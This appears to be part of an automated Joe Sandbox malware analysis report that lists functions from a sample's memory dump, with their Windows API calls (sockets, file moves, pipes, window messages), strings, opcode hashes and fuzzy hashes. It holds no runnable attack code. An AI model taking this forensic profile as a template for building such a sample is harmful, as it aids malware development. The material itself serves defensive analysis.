WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00203CD6,00000005,00000000,00000000), ref: 001F552C
WriteFile.KERNEL32(?,00203CD6,00000000,001F5BA3,00000000,?,?,?,?,?,?,?,?,?,001F5BA3,?), ref: 001F554B
WriteFile.KERNEL32(?,?,00000001,001F5BA3,00000000,?,?,?,?,?,?,?,?,?,001F5BA3,?), ref: 001F5584

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 7a6b1f8c912c6c84655e5dd608cb1a5df2a83b295801326a501c6f3fd448e592
Instruction ID: 620cde33644f0f9c925eb1f1154e28897a986b25579c0a3ca14f7964e14c9f4c
Opcode Fuzzy Hash: 7a6b1f8c912c6c84655e5dd608cb1a5df2a83b295801326a501c6f3fd448e592
Instruction Fuzzy Hash: 1D519471900B4D9FDB11CFA8D889AFEBBF6EF09300F14415AE655E7291E7709A41CB60

Function 001E2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 001E2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 001E2D53
_ValidateLocalCookies.LIBCMT ref: 001E2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 001E2E0C
_ValidateLocalCookies.LIBCMT ref: 001E2E61

Strings

csm, xrefs: 001E2DF6

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9283ddcc77a32a8cbbee0313bce335cefbb6f8b8260b91f1258d062dce0e242a
Instruction ID: 0ed4e7ccb33f07aa7d7400c8d7fe1d788cda2d5a4901ccb9392c2b89e46e2eb1
Opcode Fuzzy Hash: 9283ddcc77a32a8cbbee0313bce335cefbb6f8b8260b91f1258d062dce0e242a
Instruction Fuzzy Hash: FD41E634E00688EBCF14DFAACC59A9EBBB8BF44324F148155F9146B392D7719A11CBD0

Function 002410B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0024304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0024307A
Part of subcall function 0024304E: _wcslen.LIBCMT ref: 0024309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00241112
WSAGetLastError.WSOCK32 ref: 00241121
WSAGetLastError.WSOCK32 ref: 002411C9
closesocket.WSOCK32(00000000), ref: 002411F9

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 730eac0241349395bee42a177c2a071255d1054b09fa2a02d30935e80766ea5d
Instruction ID: 4a7a6bd6518d8afbfc22812630ae021b2eb6cd7688b3243ea66a833de4d673f2
Opcode Fuzzy Hash: 730eac0241349395bee42a177c2a071255d1054b09fa2a02d30935e80766ea5d
Instruction Fuzzy Hash: B7410331610205AFDB14DF24D889BAABBE9EF45324F148059FD0D9B291D770ED91CBE0

Function 0022CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0022DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0022CF22,?), ref: 0022DDFD

Part of subcall function 0022DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0022CF22,?), ref: 0022DE16

lstrcmpiW.KERNEL32(?,?), ref: 0022CF45
MoveFileW.KERNEL32(?,?), ref: 0022CF7F
_wcslen.LIBCMT ref: 0022D005
_wcslen.LIBCMT ref: 0022D01B
SHFileOperationW.SHELL32(?), ref: 0022D061

Strings

\*.*, xrefs: 0022CFF3

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 3dc9bb28ad5ccb14e7866e8173fe200e5cf158603cd4e8708bc489ff4d7e99f4
Instruction ID: db698eff49201125c155b9cc9eb84b0844b74313e26a3277f0a900f4e50382b1
Opcode Fuzzy Hash: 3dc9bb28ad5ccb14e7866e8173fe200e5cf158603cd4e8708bc489ff4d7e99f4
Instruction Fuzzy Hash: 4A4167718152296FDF12EFE4DA81ADD77B8AF18340F1000E6E545EB152EB34A654CF50

Function 00252DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00252E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00252E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00252E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00252EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00252EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00252EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00252F0B

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 42d2cc6da937d136d1283c0b2bfb1ecac1c9a0cdcb95fbad84f7b29e516801c7
Instruction ID: 47b3d90e73dffc88fc0b7fe2cf62cfe4e17d7766b3b829b5ef07e77533cfa255
Opcode Fuzzy Hash: 42d2cc6da937d136d1283c0b2bfb1ecac1c9a0cdcb95fbad84f7b29e516801c7
Instruction Fuzzy Hash: 9E311430614252DFEB258F58EC8AF6537E4EB8A712F140165F9009B2B2CB71B8689B08

Function 00227726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00227769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0022778F
SysAllocString.OLEAUT32(00000000), ref: 00227792
SysAllocString.OLEAUT32(?), ref: 002277B0
SysFreeString.OLEAUT32(?), ref: 002277B9
StringFromGUID2.OLE32(?,?,00000028), ref: 002277DE
SysAllocString.OLEAUT32(?), ref: 002277EC

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 43399db00a4ebd1800c953ed5664e59ced7d98da46ce5fa316a677604ad66722
Instruction ID: a7f2c81ed3f52e4a8daa71292666f4b574c8183d3ad317abaeb307d3529e0c72
Opcode Fuzzy Hash: 43399db00a4ebd1800c953ed5664e59ced7d98da46ce5fa316a677604ad66722
Instruction Fuzzy Hash: F821B27661832ABFDB10EFA8EC88CBBB3ACEB093647108025F905DB250E670DD418764

Function 002277FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00227842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00227868
SysAllocString.OLEAUT32(00000000), ref: 0022786B
SysAllocString.OLEAUT32 ref: 0022788C
SysFreeString.OLEAUT32 ref: 00227895
StringFromGUID2.OLE32(?,?,00000028), ref: 002278AF
SysAllocString.OLEAUT32(?), ref: 002278BD

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 71e30e29b690f1858b73cec367aca9ad95e9adeaa4f00265ee1dd9ef95bb4e86
Instruction ID: d8c82f974b6d0a8811f812acc01c6453ed7a7f44894aaa629429b882d6ebaf42
Opcode Fuzzy Hash: 71e30e29b690f1858b73cec367aca9ad95e9adeaa4f00265ee1dd9ef95bb4e86
Instruction Fuzzy Hash: B121A131618225BFDB10AFE8EC8CDAA77ECEB083607108125F915CB2A1E670DC41DB69

Function 002304D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 002304F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0023052E

Strings

nul, xrefs: 00230567

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: dcafb4b50972fee547e75d1a8f0a4bb10bf35c7964718b43ba5555b23e3716aa
Instruction ID: df9744dca1242053d1c143affa8ca83e50b707303c9842c1fdadd8f66ebf1d21
Opcode Fuzzy Hash: dcafb4b50972fee547e75d1a8f0a4bb10bf35c7964718b43ba5555b23e3716aa
Instruction Fuzzy Hash: 99216DB5910306AFDB209F29DC98A9A77B4BF44724F604A19F8A1D62E0E7709960CF30

Function 002305A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 002305C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00230601

Strings

nul, xrefs: 00230639

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: ac0e34be2968451d826f113e383404fe84080fb3efd0ec3ae4df081f52a2c64c
Instruction ID: 917814fd52ca82eeff58a957a43cca5d9ce9395f3488c901a0322d4ce8639064
Opcode Fuzzy Hash: ac0e34be2968451d826f113e383404fe84080fb3efd0ec3ae4df081f52a2c64c
Instruction Fuzzy Hash: 202174B55103069FDB209F699C95A5A77ACBF95B20F200A19E8A1D72D4D7B09870CF24

Function 002540AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001C604C
Part of subcall function 001C600E: GetStockObject.GDI32(00000011), ref: 001C6060
Part of subcall function 001C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001C606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00254112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0025411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0025412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00254139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00254145

Strings

Msctls_Progress32, xrefs: 002540E3

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: d0f28dda8ffd0e584b4cd3788eb2704d703df76148dc4ec850d5c3ec571dabdd
Instruction ID: 85a9d7965186134d77bcf43d54bc91a420286865e79242d479e049ec0a8cb735
Opcode Fuzzy Hash: d0f28dda8ffd0e584b4cd3788eb2704d703df76148dc4ec850d5c3ec571dabdd
Instruction Fuzzy Hash: 9711B2B215021ABEEF119F64CC85EE7BF9DEF18798F108111BA18A2090C772DC71DBA4

Function 001FD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001FD7A3: _free.LIBCMT ref: 001FD7CC

_free.LIBCMT ref: 001FD82D

Part of subcall function 001F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000), ref: 001F29DE
Part of subcall function 001F29C8: GetLastError.KERNEL32(00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000,00000000), ref: 001F29F0

_free.LIBCMT ref: 001FD838
_free.LIBCMT ref: 001FD843
_free.LIBCMT ref: 001FD897
_free.LIBCMT ref: 001FD8A2
_free.LIBCMT ref: 001FD8AD
_free.LIBCMT ref: 001FD8B8

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: b116da2278578b2e068b8ec8db4363b08ce0c363e724fbc9a24ca3aa6a3b4182
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 23112971580B18AAD621BFF0DC46FFB7B9DAF20704F400925F399AB0A2DB75A5058661

Function 0022DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0022DA74
LoadStringW.USER32(00000000), ref: 0022DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0022DA91
LoadStringW.USER32(00000000), ref: 0022DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0022DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0022DAB9

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 43f996b03f2f6ba5c6482ef9eaf17518441ad04e70419b8479b06589c9d6ffee
Instruction ID: 127562082b6e595c5bd9002f1c50c03bcf770695986e2856c2d2e47fc97a5551
Opcode Fuzzy Hash: 43f996b03f2f6ba5c6482ef9eaf17518441ad04e70419b8479b06589c9d6ffee
Instruction Fuzzy Hash: 6C014FF69103187FE710ABA4AD8DEEA726CE708306F504492B746E2041EA749E848F78

Function 0023096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(014DEB78,014DEB78), ref: 0023097B
EnterCriticalSection.KERNEL32(014DEB58,00000000), ref: 0023098D
TerminateThread.KERNEL32(00294528,000001F6), ref: 0023099B
WaitForSingleObject.KERNEL32(00294528,000003E8), ref: 002309A9
CloseHandle.KERNEL32(00294528), ref: 002309B8
InterlockedExchange.KERNEL32(014DEB78,000001F6), ref: 002309C8
LeaveCriticalSection.KERNEL32(014DEB58), ref: 002309CF

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 14e41cb31f5acab8e85fd6ec62be7aa61e1c52710f14891e46af859c2696a3cb
Instruction ID: ce123925843ec0e33ccc30b3d399d14e67c7d9f7d987fe2c96eabc3bd2812cd1
Opcode Fuzzy Hash: 14e41cb31f5acab8e85fd6ec62be7aa61e1c52710f14891e46af859c2696a3cb
Instruction Fuzzy Hash: 9BF01D31442B02BFD7416F94EE8CBDA7A25FF01702F501025F102908A0DB74A475CFA4

Function 001C5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 001C5D30
GetWindowRect.USER32(?,?), ref: 001C5D71
ScreenToClient.USER32(?,?), ref: 001C5D99
GetClientRect.USER32(?,?), ref: 001C5ED7
GetWindowRect.USER32(?,?), ref: 001C5EF8

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 59a4c9de484d98f9391e145df20bec64b1dab184d005cf4052f2fe67503c105d
Instruction ID: a395efb43992c51b5e433ab30471af98ec0fc4d42179e8884173914172b0d3cf
Opcode Fuzzy Hash: 59a4c9de484d98f9391e145df20bec64b1dab184d005cf4052f2fe67503c105d
Instruction Fuzzy Hash: 28B15A74A1074ADBDB14DFA9C480BEAB7F2BF54310F14841AE8A9D7290DB30EA91DB54

Function 001F01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 001F00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001F00D6
__allrem.LIBCMT ref: 001F00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001F010B
__allrem.LIBCMT ref: 001F0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001F0140

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction ID: ab1427fa48310cfc24fb8cd17ed281f7112a316de383975c45e3b10eae512ace
Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction Fuzzy Hash: C6813872604B0A9BE7259F69CC41B7F73E8AF55364F24423EF610D62C2EB70D9018B50

Function 00241D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00243149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0024101C,00000000,?,?,00000000), ref: 00243195

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00241DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00241DE1
WSAGetLastError.WSOCK32 ref: 00241DF2
inet_ntoa.WSOCK32(?), ref: 00241E8C
htons.WSOCK32(?,?,?,?,?), ref: 00241EDB
_strlen.LIBCMT ref: 00241F35

Part of subcall function 002239E8: _strlen.LIBCMT ref: 002239F2

Part of subcall function 001C6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,001DCF58,?,?,?), ref: 001C6DBA
Part of subcall function 001C6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,001DCF58,?,?,?), ref: 001C6DED

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
String ID:
API String ID: 1923757996-0
Opcode ID: ed811dd1dd9ca93064223dc6d9d0371fc40f5809289aed55bd049d039333bf53
Instruction ID: d0f1c3fce1dbd41e255b129d28202286bfa72cc35ea47646058033d7a61cc260
Opcode Fuzzy Hash: ed811dd1dd9ca93064223dc6d9d0371fc40f5809289aed55bd049d039333bf53
